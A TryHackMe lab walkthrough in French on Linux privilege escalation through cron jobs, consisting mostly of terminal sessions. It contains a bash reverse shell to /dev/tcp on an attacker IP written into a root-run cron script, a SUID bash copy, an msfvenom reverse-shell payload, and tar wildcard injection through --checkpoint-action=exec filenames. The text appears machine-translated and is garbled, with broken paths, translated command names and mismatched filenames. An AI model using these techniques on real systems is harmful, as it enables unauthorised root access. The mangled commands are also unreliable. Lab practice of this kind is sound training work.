[Tryhackme] Élévation du privilège en utilisant Cron Jobs! Linux PRIVEUP PARTIE 5

ssh user@10.10.166.11 255 ⨯ L'authenticité de l'hôte '10 .10.166.11 (10.10.166.11) 'ne peut pas être établie. L'empreinte digitale de la clé RSA est SHA256: jwwpvfqc + 8lpqda0b9wfzzxcxcoaho6s8wygjktank. Cette clé hôte est connue par les autres noms / adresses suivants: ~ / .ssh / connu_hosts: 1: [nom hachée] Êtes-vous sûr de vouloir continuer à vous connecter (oui / non / [empreinte digitale])? Oui Avertissement: Ajout en permanence '10 .10.166.11 '(RSA) à la liste des hôtes connus. user@10.10.166.11's Mot de passe: Linux Debian 2.6.32-5-AMD64 # 1 SMP TUe 13 mai 16:34:35 UTC 2014 X86_64 Les programmes inclus avec le système Debian GNU / Linux sont des logiciels gratuits; Les termes de distribution exacts de chaque programme sont décrits dans les fichiers individuels dans / usr / share / doc / * / copyright. Debian GNU / Linux ne comporte absolument aucune garantie, dans la mesure permise par la loi applicable. Dernière connexion: ven 15 mai 06:41:23 2020 de 192.168.1.125 Utilisateur @ debian: ~ $ 

user @ debian: ~ $ cat / etc / crontab # / etc / crontab: CRONTAB à l'échelle du système Contrairement à tout autre crontab, vous n'avez pas à exécuter la commande `Crontab '# pour installer la nouvelle version lorsque vous modifiez ce fichier # et les fichiers dans /etc/cron.d. Ces fichiers ont également des champs de nom d'utilisateur, # qu'aucun des autres crontabs ne le fait. Shell = / bin / sh path = / home / user: / usr / local / sbin: / usr / local / bin: / sbin: / usr / sbin: / usr / bin # mh dom mon dow command 17 * * * root cd /& run -ps --report /etc/cron.hourly 25 6 * * * root test -x / usr / sbin / anacron || (cd / && run-plats --report /etc/cron.daily) 47 6 * * 7 root test -x / usr / sbin / anacron || (cd / && run -ps --report /etc/cron.weekly) 52 6 1 * * root test -x / usr / sbin / anacron || (cd / && run -ps --report /etc/cron.monthly) # * * * * * * root reverse.sh * * * * * root /usr/local/bin/compress.sh

Utilisateur @ debian: ~ $ localiser l'écrasement.sh /usr/local/bin/overwrite.sh

utilisateur @ debian: ~ $ ll /usr/local/bin/overwrite.sh -rwxr - rw- 1 root personnel 40 mai 13 2017 /usr/local/bin/overwrite.sh

Utilisateur @ debian: ~ $ vi /usr/local/bin/overwrite.sh user @ debian: ~ $ cat /usr/local/bin/overwrite.sh #! / bin / bash bash -i> & /dev/tcp/10.18.110.90/4444 0> & 1

┌fique (HackLab㉿hackLab) - [~] └─ $ NC -NVLP 4444 Écoute sur [Any] 4444 ... Connectez-vous à [10.18.110.90] de (inconnu) [10.10.166.11] 52692 bash: pas de contrôle de travail dans cette racine de coquille @ debian: ~ # # 

root @ debian: ~ # whoami whoami root root @ debian: ~ # 

user @ debian: ~ $ cat / etc / crontab # / etc / crontab: CRONTAB à l'échelle du système Contrairement à tout autre crontab, vous n'avez pas à exécuter la commande `Crontab '# pour installer la nouvelle version lorsque vous modifiez ce fichier # et les fichiers dans /etc/cron.d. Ces fichiers ont également des champs de nom d'utilisateur, # qu'aucun des autres crontabs ne le fait. Shell = / bin / sh path = / home / user: / usr / local / sbin: / usr / local / bin: / sbin: / usr / sbin: / usr / bin # mh dom mon dow command 17 * * * root cd /& run -ps --report /etc/cron.hourly 25 6 * * * root test -x / usr / sbin / anacron || (cd / && run-plats --report /etc/cron.daily) 47 6 * * 7 root test -x / usr / sbin / anacron || (cd / && run -ps --report /etc/cron.weekly) 52 6 1 * * root test -x / usr / sbin / anacron || (cd / && run -ps --report /etc/cron.monthly) # * * * * * * root reverse.sh * * * * * root /usr/local/bin/compress.sh

user @ debian: ~ $ vi /home/user/overwrite.sh user @ debian: ~ $ cat /home/user/overwrite.sh #! / bin / bash cp / bin / bash / tmp / rootbash chmod + xs / tmp / rootbashash

utilisateur @ debian: ~ $ / tmp / rootbash -p rootbash-4.1 # whoami root

Utilisateur @ debian: ~ $ cat /usr/local/bin/compress.sh #! / bin / sh CD / home / utilisateur tar czf /tmp/backup.tar.gz *

┌fique (HackLab㉿HackLab) - [~] └─ $ msfvenom -p linux / x64 / shell_reverse_tcp lhost = 10.18.110.90 lport = 4444 -f elf -o shell.el [-] Aucune plate-forme n'a été sélectionnée, choisissant MSF :: module :: plate-forme :: Linux à la charge de rémunération [-] Aucun arche, sélection, x64 à la plate-forme: Linux à partir de la charge de paie [-] AUCUN ARCH, Sélectionné, x64 Platform: Linux à la charge de paiement [-] Aucun arche, sélection, Sélection: X64. Encodeur spécifié, Sortie de charge utile brute Taille de charge utile: 74 octets Taille finale du fichier elfe: 194 octets enregistrés comme: shell.elf

┌fiques (HackLab㉿HackLab) - [~ / TRYHACKME / LinuxPrivenv] └sé 

Utilisateur @ debian: ~ $ ll Total 12 -rw-r - r-- 1 utilisateur utilisateur 212 15 mai 2017 myvpn.ovpn -rw-r - r-- 1 utilisateur d'utilisateur 194 avr 6 09:18

Chmod + x /home/user/shell.elf user @ debian: ~ $ ll total 12 -rw-r - r-- 1 utilisateur utilisateur 212 15 mai 2017 myvpn.ovpn -rwxr-xr-x 1 utilisateur utilisateur 194 avr 6 09:18 shell.elf DRWXR-xr-x 8 utilisateur utilisateur 4096 15 mai 2020 outils outils

user @ debian: ~ $ touch / home / user / - checkpoint = 1 utilisateur @ debian: ~ $ touch /home/user/ --checkpoint-action=exec=shell.ell user @ debian: ~ $ ll total 12 -rw-r - r-- utilisateur 0 avr 6 09:26 --checkpoint = 1-rw-r- r - 1 utilisateur 0 avr 6 09:28 --checkpoint-action = execy -rw-r - r-- 1 utilisateur utilisateur 212 15 mai 2017 myvpn.ovpn -rwxr-xr-x 1 utilisateur utilisateur 194 avr 6 09:18 shell.ell Drwxr-xr-x 8 utilisateur utilisateur 4096 15 mai 2020 outils

┌── (hackLab㉿hackLab) - [~] └─ $ nc -nvlp 4444 Écoute sur [any] 4444 ... connectez-vous à [10.18.110.90] de (inconnu) [10.10.166.11] 52692 bash: pas de contrôle de travail dans cette root shell @ debian: ~ # whoami whoami root root @ debian: ~ #